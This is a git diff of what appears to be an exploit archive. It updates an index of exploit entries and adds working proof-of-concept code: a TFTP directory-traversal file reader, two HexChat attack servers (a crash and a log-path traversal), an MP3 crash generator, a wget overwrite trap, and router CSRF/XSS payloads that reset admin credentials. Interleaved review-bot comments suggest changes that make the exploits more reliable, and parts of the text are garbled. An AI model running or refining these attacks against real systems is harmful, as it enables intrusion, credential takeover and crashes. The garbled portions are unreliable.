 38066,platforms/php/webapps/38066.txt,"WordPress Video Lead Form Plugin 'errMsg' Parameter Cross Site Scripting Vulnerability",2012-11-29,"Aditya Balapure",php,webapps,0
-38067,platforms/hardware/webapps/38067.py,"Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass",2015-09-02,"Glaysson dos Santos",hardware,webapps,80
+38067,platforms/hardware/webapps/38067.py,"Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass",2015-09-02,Orwelllabs,hardware,webapps,80
 37833,platforms/php/webapps/37833.txt,"YCommerce Multiple SQL Injection Vulnerabilities",2012-09-21,"Ricardo Almeida",php,webapps,0
 37834,platforms/linux/remote/37834.py,"Samba 3.5.11/3.6.3 Unspecified Remote Code Execution Vulnerability",2012-09-24,kb,linux,remote,0
 37835,platforms/php/webapps/37835.html,"WordPress Cross Site Request Forgery Vulnerability",2012-09-22,AkaStep,php,webapps,0
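Review bot: The author column for entry 38067 changes from a named researcher to Orwelllabs, but platforms/hardware/webapps/38067.py is not touched in this diff, so the index may now disagree with the credit line inside the exploit file itself; the same applies to entry 38245 in the hunk at -34548. If the re-attribution is intentional (a handle replacing a real name, or a credit correction), a note to that effect in the commit message would let the change be verified later, since this file is what downstream consumers use for attribution.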
@@ -34548,7 +34548,7 @@ id,file,description,date,author,platform,type,port
 38242,platforms/hardware/remote/38242.txt,"Thomson CableHome Gateway (DWG849) Cable Modem Gateway - Information Exposure",2015-09-19,"Matthew Dunlap",hardware,remote,0
 38243,platforms/windows/local/38243.py,"Total Commander 8.52 - Buffer Overflow (Windows 10)",2015-09-20,VIKRAMADITYA,windows,local,0
 38244,platforms/windows/local/38244.py,"Total Commander 8.52 - Buffer Overflow",2015-09-20,VIKRAMADITYA,windows,local,0
-38245,platforms/hardware/webapps/38245.txt,"ADH-Web Server IP-Cameras - Multiple Vulnerabilities",2015-09-20,"Glaysson dos Santos",hardware,webapps,0
+38245,platforms/hardware/webapps/38245.txt,"ADH-Web Server IP-Cameras - Multiple Vulnerabilities",2015-09-20,Orwelllabs,hardware,webapps,0
 38246,platforms/php/webapps/38246.txt,"iCart Pro 'section' Parameter SQL Injection Vulnerability",2013-01-25,n3tw0rk,php,webapps,0
 38248,platforms/multiple/remote/38248.txt,"Multiple Hunt CCTV Information Disclosure Vulnerability",2013-01-29,"Alejandro Ramos",multiple,remote,0
 38249,platforms/multiple/dos/38249.txt,"MiniUPnP Multiple Denial of Service Vulnerabilities",2012-01-28,Rapid7,multiple,dos,0
@@ -35879,3 +35879,7 @@ id,file,description,date,author,platform,type,port
 39651,platforms/android/dos/39651.txt,"Android - ih264d_process_intra_mb Memory Corruption",2016-04-01,"Google Security Research",android,dos,0
 39652,platforms/multiple/dos/39652.txt,"Adobe Flash - Color.setTransform Use-After-Free",2016-04-01,"Google Security Research",multiple,dos,0
 39653,platforms/php/dos/39653.txt,"PHP 5.5.33 - Invalid Memory Write",2016-04-01,vah_13,php,dos,0
+39654,platforms/windows/dos/39654.pl,"Xion Audio Player <= 1.5 (build 160) - .mp3 Crash PoC",2016-04-04,"Charley Celice",windows,dos,0
+39656,platforms/multiple/local/39656.py,"Hexchat IRC Client 2.11.0 - Directory Traversal",2016-04-04,PizzaHatHacker,multiple,local,0
+39657,platforms/multiple/dos/39657.py,"Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow",2016-04-04,PizzaHatHacker,multiple,dos,0
+39659,platforms/hardware/webapps/39659.txt,"PQI Air Pen Express 6W51-0000R2 and 6W51-0000R2XXX - Multiple Vulnerabilities",2016-04-04,Orwelllabs,hardware,webapps,0
diff --git a/platforms/hardware/dos/38475.txt b/platforms/hardware/dos/38475.txt
index f52a6ff7f..d5ad1763f 100755
--- a/platforms/hardware/dos/38475.txt
+++ b/platforms/hardware/dos/38475.txt
@@ -13,6 +13,8 @@ Reported: Public release: Author: Lyon Yang +Paper: https://www.exploit-db.com/docs/39658.pdf + Summary: --------
diff --git a/platforms/hardware/remote/17507.py b/platforms/hardware/remote/17507.py
index 3b58b1d8b..3d6f541da 100755
--- a/platforms/hardware/remote/17507.py
+++ b/platforms/hardware/remote/17507.py
@@ -1,105 +1,8 @@ -############################################################################## - -Title : Avaya IP Office Manager TFTP Server Directory Traversal Vulnerability -Author : Veerendra G.G from SecPod Technologies (www.secpod.com) -Vendor : http://www.avaya.com/usa/product/ip-office -Advisory : http://www.avaya.com/usa/product/ip-office - http://secpod.org/SECPOD_Avaya-IP-Manager-TFTP-Dir-Trav.pcap - http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py - http://secpod.org/advisories/SECPOD_Avaya_IP_Manager_TFTP_Dir_Trav.txt -Version : Avaya IP Office Manager TFTP Server Version 8.1 -Date : 08/07/2011 - -############################################################################### - -SecPod ID: 1017 25/05/2011 Issue Discovered - 31/05/2011 Vendor Notified - No Response from the Vendor - 08/07/2011 Advisory Released - - -Class: Information Disclosure Severity: Medium - - -Overview: ---------- -Avaya IP Office Manager TFTP Server Version 8.1 is prone to a Directory -Traversal vulnerability. - - -Technical Description: ----------------------- -The vulnerability is caused due to improper validation to Read Request -Parameter containing '../' sequences, which allows attackers to read -arbitrary files via directory traversal attacks. - - -Impact: --------- -Successful exploitation could allow an attacker to to obtain sensitive -information, which can lead to launching further attacks. - - -Affected Software: ------------------- -Avaya IP Office Manager TFTP Server Version 8.1 - - -Tested on: ------------ -Avaya IP Office Manager TFTP Server Version 8.1 on Windows XP SP3. 
- - -References: ------------ -http://secpod.org/blog/?p=225 -http://www.avaya.com/usa/product/ip-office -http://secpod.org/SECPOD_Avaya-IP-Manager-TFTP-Dir-Trav.pcap -http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py -http://secpod.org/advisories/SECPOD_Avaya_IP_Manager_TFTP_Dir_Trav.txt - - -Proof of Concept: ----------------- -http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py -http://secpod.org/SECPOD_Avaya-IP-Manager-TFTP-Dir-Trav.pcap - - -Solution: ----------- -Not available - - -Risk Factor: -------------- - CVSS Score Report: - ACCESS_VECTOR = NETWORK - ACCESS_COMPLEXITY = LOW - AUTHENTICATION = NOT_REQUIRED - CONFIDENTIALITY_IMPACT = PARTIAL - INTEGRITY_IMPACT = NONE - AVAILABILITY_IMPACT = NONE - EXPLOITABILITY = PROOF_OF_CONCEPT - REMEDIATION_LEVEL = UNAVAILABLE - REPORT_CONFIDENCE = CONFIRMED - CVSS Base Score = 5.0 (AV:N/AC:L/Au:NR/C:P/I:N/A:N) - CVSS Temporal Score = 4.5 - Risk factor = Medium - - -Credits: --------- -Veerendra G.G of SecPod Technologies has been credited with the discovery of -this vulnerability. - - -SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py: - #!/usr/bin/python ############################################################################## -# Exploit : http://secpod.org/blog/?p=3D225 -# http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py -# http://secpod.org/advisories/SECPOD_Avaya_IP_Manager_TFTP_Dir_Trav.txt +# Exploit : http://secpod.com/blog/?p=225 +# http://secpod.org/Exploit-Avaya-IP-Manager-Dir-Trav.py +# http://secpod.org/advisories/SecPod_Avaya_IP_Manager_TFTP_Dir_Trav.txt # Author : Veerendra G.G from SecPod Technologies (www.secpod.com) # # Get File content using Directory Traversal Attack 
@@ -111,13 +14,13 @@ def sendPacket(HOST, PORT, data): Sends UDP Data to a Particular Host on a Specified Port with a Given Data and Return the Response ''' - udp_sock =3D socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) udp_sock.sendto(data, (HOST, PORT)) - data =3D udp_sock.recv(1024) + data = udp_sock.recv(1024) udp_sock.close() return data -if __name__ =3D=3D "__main__": +if __name__ == "__main__": if len(sys.argv) < 2: print "\tUsage: python exploit.py target_ip" @@ -125,13 +28,13 @@ if __name__ =3D=3D "__main__": print "\tExiting..." sys.exit(0) - HOST =3D sys.argv[1] =09=09=09## The Server IP - PORT =3D 69 =09=09=09## Default TFTP port + HOST = sys.argv[1] ## The Server IP + PORT = 69 ## Default TFTP port - data =3D "\x00\x01" =09=09=09## TFTP Read Request - data +=3D "../" * 10 + "boot.ini" + "\x00"=09## Read boot.ini file using directory traversal - data +=3D "octet\x00"=09=09=09=09## TFTP Type + data = "\x00\x01" ## TFTP Read Request + data += "../" * 10 + "boot.ini" + "\x00" ## Read boot.ini file using directory traversal + data += "octet\x00" ## TFTP Type - rec_data =3D sendPacket(HOST, PORT, data) + rec_data = sendPacket(HOST, PORT, data) print "Data Found on the target : %s " %(HOST) print rec_data.strip() \ No newline at end of file diff --git a/platforms/hardware/webapps/39659.txt b/platforms/hardware/webapps/39659.txt new file mode 100755 index 000000000..4999ff62a --- /dev/null +++ b/platforms/hardware/webapps/39659.txt 
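Review bot: `udp_sock.recv(1024)` in sendPacket has no timeout, so against a host that drops UDP/69 or simply never answers the script blocks forever instead of reporting failure; add `udp_sock.settimeout(5)` right after the socket is created and let the resulting `socket.timeout` surface to the caller. The single `recv(1024)` also only ever collects the first TFTP DATA block (512 bytes of payload) and nothing is ACKed, so larger files are silently truncated — a comment such as `# only the first 512-byte DATA block is read; no ACK is sent` would make that PoC limitation explicit. sendPacket's `def` line is the hunk's context header and lies above the hunk.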
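Review bot: The `print "Data Found on the target : %s "` path prints whatever the server returned, so a TFTP ERROR packet (opcode 5, e.g. "File not found" when the traversal is blocked or boot.ini is absent) is reported as found data, and the 4-byte DATA header is dumped along with the file contents. Check the opcode before claiming success: `if rec_data[:2] != "\x00\x03": print "No data returned, server replied: %r" % rec_data; sys.exit(1)` and then `print rec_data[4:].strip()`. The `if __name__ == "__main__":` line is the hunk's context header, so the block begins above the hunk.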
@@ -0,0 +1,231 @@ + _ _ _ _ + | | | | | | + ___ _ ____ _____| | | | __ _| |__ ___ + / _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __| +| (_) | | \ V V / __/ | | | (_| | |_) \__ \ + \___/|_| \_/\_/ \___|_|_|_|\__,_|_.__/|___/ + + Security Adivisory + 2016-04-03 + www.orwelllabs.com + Twitter:@orwelllabs + + magicword: d0ubl3th1nk1ng... + + +Overview +======= +Technical Risk: high +Likelihood of Exploitation: medium +Vendor: PQI Group +Affected Products: PQI Air Pen Express - Wireless Router 6W51-0000R2 and +6W51-0000R2XXX +Credits: Discovered and researched by Orwelllabs +Adivisory URL: +http://www.orwelllabs.com/2016/04/pqi-air-pen-express-wireless-router.html + + +Issues +===== +I. Multiple Cross-Site Request Forgery (CSRF) (CWE-352) +II. Multiple Stored Cross-site Scripting (CWE-79) +III. Multiple Reflected Cross-Site Scripting (CWE-79) +IV. Insecure Direct Request +V. Insecure Default Permissions (CWE-276) +VI. No SSL + + +background +========= +The smart lipstick-shaped PQI Air Pen express is the world's smallest +wireless router/access point combo you can get today. +PQI Air Pen express can be powered via an external adapter or a powered USB +port on your computer and provide a excellent wireless expreience for +everyone. + + +I. Cross-Site Request Forgery (CSRF) (CWE-352) +``````````````````````````````````````````````````````````````````````` +If a user visits a page bellow, this will set the administrative credential +for PQI Air Pen express to "root:r00t" + + + + +
+ + + +
+ + + + +The attacker can also abuse of the multiple XSS in this device to exploit +this vulnerability, something like this to set the same cred 'root:r00t' + +http:// +{airpenXweb}/goform/setWizard?connectionType=DHCP&ssid=%3Cscript%20src=%22 +http://airpenXweb/goform/setSysAdm?admuser=root&admpass=r00t%22%3E%3C/script%3E%3C!-- + + +The following poc will set the credential to access point to "3groot:3g00t" +(and of course, any other value could be set in this way.) + + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + < -- 3G +User + <-- 3G +Password + + + + +
+ + + + +II. Stored Cross-site Scripting (CWE-79) +`````````````````````````````````````````````````````````` +"Wide Area Network (WAN) Settings" + +# PocParameter: "hostname" +http://{airpenXweb}/goform/setWan?connectionType=DHCP&staticIp=xxx.xxx.xxx.xxx&staticNetmask=255.255.255.0&staticGateway=&staticPriDns=&staticSecDns=xxx.xxx.xxx.xxx&hostname=[ +* STOREDXSS +*]&pppoeUser=pppoe_user&pppoePass=pppoe_passwd&pppoePass2=pppoe_passwd&pppoeOPMode=KeepAlive&pppoeRedialPeriod=60&pppoeIdleTime=5&l2tpServer=l2tp_server&l2tpUser=l2tp_user&l2tpPass=l2tp_passwd&l2tpMode=0&l2tpIp=192.168.1.1&l2tpNetmask=255.255.255.0&l2tpGateway=192.168.1.254&l2tpOPMode=KeepAlive&l2tpRedialPeriod=60&pptpServer=pptp_server&pptpUser=pptp_user&pptpPass=pptp_passwd&pptpMode=0&pptpIp=192.168.1.1&pptpNetmask=255.255.255.0&pptpGateway=192.168.1.254&pptpOPMode=KeepAlive&pptpRedialPeriod=60&APN3G=&PIN3G=&Dial3G=&User3G=&Password3G=&Dev3G=Auto&macCloneEnbl=0&macCloneMac= + + +"Webs URL Filter Settings" + +# PocParameter: "addURLFilter" +http://{airpenXweb}/goform/websURLFilter?addURLFilter=[ *STOREDXSS* +]&addwebsurlfilter=Add + +Request in this page will show a pop-up with a content of javascript +payload: +http://{airpenXweb}/firewall/content_filtering.asp + +# Parameter: "addHostFilter" +http://{airpenXweb}/goform/websHostFilter?addHostFilter=[ *STOREDXSS* +]&addwebscontentfilter=Add + + +III. Reflected Cross-Site Scripting (CWE-79) +`````````````````````````````````````````````````````````````` +Virtually all application inputs are vulnerable to cross-site scripting, +since it is not carried out any validation of the data provided by the +user. 
+Bellow are some examples: + + +"Basic Wireless Settings" + +# PocParameter: "mssid_0" +http://{airpenXweb}/goform/wirelessBasic?radiohiddenButton=2&wifihiddenButton=2&wirelessmode=9&bssid_num=1&mssid_0=[* +XSS * +]&mssid_1=&mssid_2=&mssid_3=&mssid_4=&mssid_5=&mssid_6=&mssid_8=&mssid_9=&mssid_10=&mssid_11=&mssid_12=&mssid_13=&mssid_14=&mssid_15=&broadcastssid=1&apisolated=0&mbssidapisolated=0&sz11gChannel=1&n_mode=0&n_bandwidth=1&n_gi=1&n_mcs=33&n_rdg=1&n_extcha=1&n_stbc=1&n_amsdu=0&n_autoba=1&n_badecline=0&n_disallow_tkip=1&n_2040_coexit=1&tx_stream=1&rx_stream=1 + +# PocParameter: "ssid" +http://{airpenXweb}/goform/setWizard?connectionType=DHCP&ssid=[ * XSS * +]&security_mode=Disable&wzsecureAlgorithm=AES + +# PocParameter: "hostname" +http://{airpenXweb}/goform/setWan?connectionType=[ -*- XSS +-*-]&staticIp=xxx.xxx.xxx.xxx&staticNetmask=255.255.255.0&staticGateway=xxx.xxx.xxx.xxx&staticPriDns=xxx.xxx.xxx.xxx5&staticSecDns=203.185.0.36&hostname=tiat&pppoeUser=pppoe_user&pppoePass=pppoe_passwd&pppoePass2=pppoe_passwd&pppoeOPMode=KeepAlive&pppoeRedialPeriod=60&pppoeIdleTime=5&l2tpServer=l2tp_server&l2tpUser=l2tp_user&l2tpPass=l2tp_passwd&l2tpMode=0&l2tpIp=192.168.1.1&l2tpNetmask=255.255.255.0&l2tpGateway=192.168.1.254&l2tpOPMode=KeepAlive&l2tpRedialPeriod=60&pptpServer=pptp_server&pptpUser=pptp_user&pptpPass=pptp_passwd&pptpMode=0&pptpIp=192.168.1.1&pptpNetmask=255.255.255.0&pptpGateway=192.168.1.254&pptpOPMode=KeepAlive&pptpRedialPeriod=60&APN3G=&PIN3G=&Dial3G=&User3G=%3Cscript%3Ealert%281%29%3C/script%3E&Password3G=&Dev3G=Auto&macCloneEnbl=0&macCloneMac= + +# Parameter: "admpass" +http://{airpenXweb}/goform/setSysAdm?admuser=root&admpass=[ -*- XSS -*- ] + +IV. Insecure Direct Request +```````````````````````````````````````` +This device allows remote attackers to obtain sensitive information, +including all credentials available via direct request to +/cgi-bin/ExportSettings.sh. + +PoC: +http://{airpenXweb}/cgi-bin/ExportSettings.sh + +V. 
Insecure Default Permissions (CWE-276) +`````````````````````````````````````````````````````````````` +In the device description (on the Vendor's site) it is very clear that the +priority is to +facilitate everything for you, including setting. Therefore it is not +mandatory that a password +is configured for the web interface and not to connect to the AP, this way +you can find hundreds +of these completely unprotected APs. + +VI. No SSL +`````````````````` +Any action, whether sensitive or not is transmitted in plain text because +HTTPS is not used and no step. + +POST /goform/setSysAdm HTTP/1.1 +Host: xxx.xxx.xxx.xxx +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 +Firefox/44.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http://xxx.xxx.xxx.xxx/adm/management.asp +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 35 + +admuser=ORWL_user&admpass=ORWL_pass + +Timeline +======= +2015-10-25 - Issues discovered +2015-11-04 - Vendor contacted +2015-12-12 - Another attempt to contact the Vendor... +2016-02-26 - Public Disclosure +* There is no easy way to contact the vendor. Emails sent remain unanswered +and forms site contacts as well. diff --git a/platforms/multiple/dos/39657.py b/platforms/multiple/dos/39657.py new file mode 100755 index 000000000..aa87be34b --- /dev/null +++ b/platforms/multiple/dos/39657.py 
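Review bot: The Timeline states `2016-02-26 - Public Disclosure` while the advisory header is dated 2016-04-03 and the CSV entry 2016-04-04, so at least one date is wrong and the disclosure window after the 2015-11-04 vendor contact cannot be judged from the text; the timeline should carry the actual publication date. Section IV says /cgi-bin/ExportSettings.sh returns all credentials "via direct request" but never states whether that request succeeds without an authenticated session, which is the detail that separates an unauthenticated information leak from a post-auth export feature — a sentence such as `Tested unauthenticated from a fresh browser session` (or the opposite) is needed. The CSRF PoC HTML forms appear only as empty lines in this copy, so the field names for /goform/setSysAdm and the 3G-credential form can only be inferred from the request shown in section VI.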
@@ -0,0 +1,74 @@ +#!/usr/bin/python +# +#################### +# Meta information # +#################### +# Exploit Title: Hexchat IRC client - CAP LS Handling Stack Buffer Overflow +# Date: 2016-02-07 +# Exploit Author: PizzaHatHacker +# Vendor Homepage: https://hexchat.github.io/index.html +# Software Link: https://hexchat.github.io/downloads.html +# Version: 2.11.0 +# Tested on: HexChat 2.11.0 & Linux (64 bits) + HexChat 2.10.2 & Windows 8.1 (64 bits) +# CVE : CVE-2016-2233 + +############################# +# Vulnerability description # +############################# +''' +Stack Buffer Overflow in src/common/inbound.c : +void inbound_cap_ls (server *serv, char *nick, char *extensions_str, const message_tags_data *tags_data) + +In this function, Hexchat IRC client receives the available extensions from +the IRC server (CAP LS message) and constructs the request string to indicate +later which one to use (CAP REQ message). +This request string is stored in the fixed size (256 bytes) byte array +'buffer'. It has enough space for all possible options combined, BUT +it will overflow if some options are repeated. + +CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:P) +CVSS Base Score : 7.5 +Impact Subscore : 6.4 +Exploitability Subscore : 10 +''' + +#################### +# Proof of Concept # +#################### +''' +* Install Hexchat IRC Client +* Run this Python script on a (server) machine +* Connect to the server running the script +* Results : Hexchat will crash (most probably access violation/segmentation fault) +''' + +import socket +import sys +import time + +# Exploit configuration +HOST = '' +PORT = 6667 +SERVERNAME = 'irc.example.com' +OPTIONS = 'multi-prefix ' * 100 # 13*100 = 1300 bytes > 256 bytes + +# Create server socket +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +try: + sock.bind((HOST, PORT)) # Bind to port + sock.listen(0) # Start listening on socket + + print 'Server listening, waiting for connection...' 
+ conn, addr = sock.accept() + + print 'Connected with ' + addr[0] + ':' + str(addr[1]) + ', sending packets...' + conn.send(':' + SERVERNAME + ' CAP * LS :' + OPTIONS + '\r\n') + + # Wait and close socket + conn.recv(256) + sock.close() + + print 'Done.' + +except socket.error as msg: + print 'Network error : ' + str(msg[0]) + ' ' + msg[1] diff --git a/platforms/multiple/local/39656.py b/platforms/multiple/local/39656.py new file mode 100755 index 000000000..145d74d03 --- /dev/null +++ b/platforms/multiple/local/39656.py 
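Review bot: The listener is bound without `SO_REUSEADDR`, so re-running the PoC within the TIME_WAIT window after a HexChat connection fails with "Address already in use" and lands in the except branch; add `sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)` before `sock.bind((HOST, PORT))`. The accepted `conn` is never closed (only the listening `sock` is), so the client sees an abrupt teardown rather than an orderly close — add `conn.close()` before `sock.close()`. `HOST = ''` listens on every interface, and since this serves a crash payload to whoever connects, a comment noting that, or defaulting to `127.0.0.1` for local testing, would be appropriate.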
@@ -0,0 +1,93 @@ +#!/usr/bin/python +# +#################### +# Meta information # +#################### +# Exploit Title: Hexchat IRC client - Server name log directory traversal +# Date: 2016-01-26 +# Exploit Author: PizzaHatHacker +# Vendor Homepage: https://hexchat.github.io/index.html +# Software Link: https://hexchat.github.io/downloads.html +# Version: 2.11.0 +# Tested on: HexChat 2.11.0 & Linux (64 bits) +# CVE : CVE-2016-2087 + +############################# +# Vulnerability description # +############################# +''' +Server Name Directory Traversal in src/common/text.c : +static char * log_create_pathname (char *servname, char *channame, char *netname) + +In this function, channame (channel name) and netname (network name as +configured in the client software) are sanitized to prevent directory +traversal issues when creating a logfile BUT servname (server-provided +information) is NOT sanitized before possibly being injected into +the file path via the 'log_insert_vars' function call. + +This bug could be triggered in the special (non-default) configuration +where a user would have : +* Enabled logging (Settings > Preferences > Chatting > Logging) +* Used a pattern containing '%s' in the log filepath (instead +of the default = '%n\%c.log'). + +When connecting to a malicious server, Hexchat IRC client may create or modify +arbitrary files on the filesystem with the permissions of the IRC client user +(non-root). For example, the following directories are accessible easily : +* /addons : Executable plugin files that are automatically loaded +when starting Hexchat IRC client +* /logs : ALL logfiles (from other servers too) +* /scrollback : Scrollback text that is automatically +loaded when entering a channel/server (this may trigger further bugs) +* /sounds : Sounds that may be played on demand via CTCP +SOUND messages (this could also trigger further bugs) +* etc. 
+ +CVSS v2 Vector : (AV:N/AC:H/Au:N/C:N/I:P/A:P) +CVSS Base Score : 4 +Impact Subscore : 4.9 +Exploitability Subscore : 4.9 +''' + +#################### +# Proof of Concept # +#################### +''' +* Install Hexchat IRC Client +* Settings > Preferences > Chatting > Logging : Enable logging and use the log +filepath pattern : '%s\%c.log' (without the quotes) +* Run this Python script on a (server) machine +* Connect to the server running the script +* Results : A 'PIZZA' directory will appear in /PIZZA instead +of something like /logs/___PIZZA +''' + +import socket +import sys +import time + +# Exploit configuration +HOST = '' +PORT = 6667 +SERVERNAME = '../PIZZA' + +# Create server socket +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +try: + sock.bind((HOST, PORT)) # Bind to port + sock.listen(0) # Start listening on socket + + print 'Server listening, waiting for connection...' + conn, addr = sock.accept() + + print 'Connected with ' + addr[0] + ':' + str(addr[1]) + ', sending packets...' + conn.send(':' + SERVERNAME + ' 001 bob :Welcome to the Internet Relay Network\r\n') + + # Wait and close socket + conn.recv(256) + sock.close() + + print 'Done.' + +except socket.error as msg: + print 'Failure binding to port : ' + str(msg[0]) + ' ' + msg[1] diff --git a/platforms/multiple/remote/689.pl b/platforms/multiple/remote/689.pl index 5b57c356c..3616307d9 100755 --- a/platforms/multiple/remote/689.pl +++ b/platforms/multiple/remote/689.pl @@ -1,8 +1,8 @@ #!/usr/bin/perl -W # wgettrap.poc -- A POC for the wget(1) directory traversal vulnerability # -# Copyright 2004 Jan Min=C3=A1=C5=99 (jjminar fastmail fm) -# License: Public Domain - SECU +# Copyright 2004 Jan Min???? (jjminar fastmail fm) +# License: Public Domain # # When wget connects to us, we send it a HTTP redirect constructed so that wget # wget will connect the second time, it will be attempting to override 
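Review bot: The message `'Failure binding to port : '` is printed for every `socket.error` raised inside the try, which also covers `accept`, `send` and `recv`, so a client reset during `conn.recv(256)` is reported as a bind failure; either narrow the try to `sock.bind`/`sock.listen` or use a neutral message such as `'Network error : '` as the sibling 39657.py in this commit does. The accepted `conn` is never closed and the listener lacks `SO_REUSEADDR`, so an immediate re-run after a test fails with "Address already in use" — `sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)` before the bind and `conn.close()` before `sock.close()` address both. The description's paths (`/addons`, `/logs`, `/PIZZA`) appear to have lost a config-directory prefix in this copy, so the PoC comment about where the directory appears cannot be verified as written.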
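Review bot: The new copyright line reads `# Copyright 2004 Jan Min???? (jjminar fastmail fm)`; the old side's `=C3=A1=C5=99` is quoted-printable for the UTF-8 bytes C3 A1 C5 99, i.e. `Minář`, so if those four characters are literal question marks rather than a display artefact of those bytes the decode was lossy and the line should be `# Copyright 2004 Jan Minář (jjminar fastmail fm)` with the file saved as UTF-8. The hunk also drops ` - SECU` from the License line with no counterpart elsewhere in the change, presumably another transport artefact being stripped rather than a licensing change; a word in the commit message would settle that.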
@@ -12,20 +12,20 @@ use POSIX qw(strftime); # This is our scheme/host/port -$server =3D "http://localhost:31340"; +$server = "http://localhost:31340"; # Use this + DNS poisoning with wget 1.9 & CVS -#$server =3D "http://.."; +#$server = "http://.."; -# Wanna know who got infected?=20 -#$log =3D "/dev/pts/1"; +# Wanna know who got infected? +#$log = "/dev/pts/1"; # The filename we will try to overwrite on the target system -$filename =3D "/home/jan/.procm4ilrc%00This%20part%20will%20be%20ignored."; +$filename = "/home/jan/.procm4ilrc%00This%20part%20will%20be%20ignored."; ############### Payload ######################################### -$email =3D 'your@mailbox'; -$password =3D 'Pmrpuf ner cevzvgvirf'; -$payload =3D <$log" if $log; while(){ -print LOG $_ if $log; -if (/\Q$trick$filename\E/) { -#if (/%2f/) { -# We see the filename, so this is the second time -# they're here. Time to feed the sploit. -$second++; -} elsif (/^Range: bytes=3D\(33\)-/) { -# Appending goes like this: -# (1) Tell'em what you're gonna tell'em -# (2) Then tell'em just a half -# (3) Close it -# (4) Wait -# (5) They're comin' back, with wget -c -# (6) Tell'em the sploit -# (7) Close again -# (8) Wtf? They're comin' back with wget -c again -# (9) Tell'em the rest... -# (10) ... enjoying the backdoor at the same time -print LOG "File if $1 bytes long\n" if $log; -} elsif (/^\r?$/) { -# The HTTP headers are over. Let's do it! -$date =3D strftime ("%a, %e %b %Y %H:%M:%S %z", localtime); -if (!$second) { -# Print the payload -print <\r EOT -} else { -# Print the redirection -print <new('legit.mp3'); # whatever mp3 you got handy + +$mp3->title_set('A' x 5000); # title/artist tags +$mp3->artist_set('A' x 5000); # may vary although both seems to be needed + +$mp3->update_tags(); +$mp3->close(); + +print "[*] Completed.\n"; \ No newline at end of file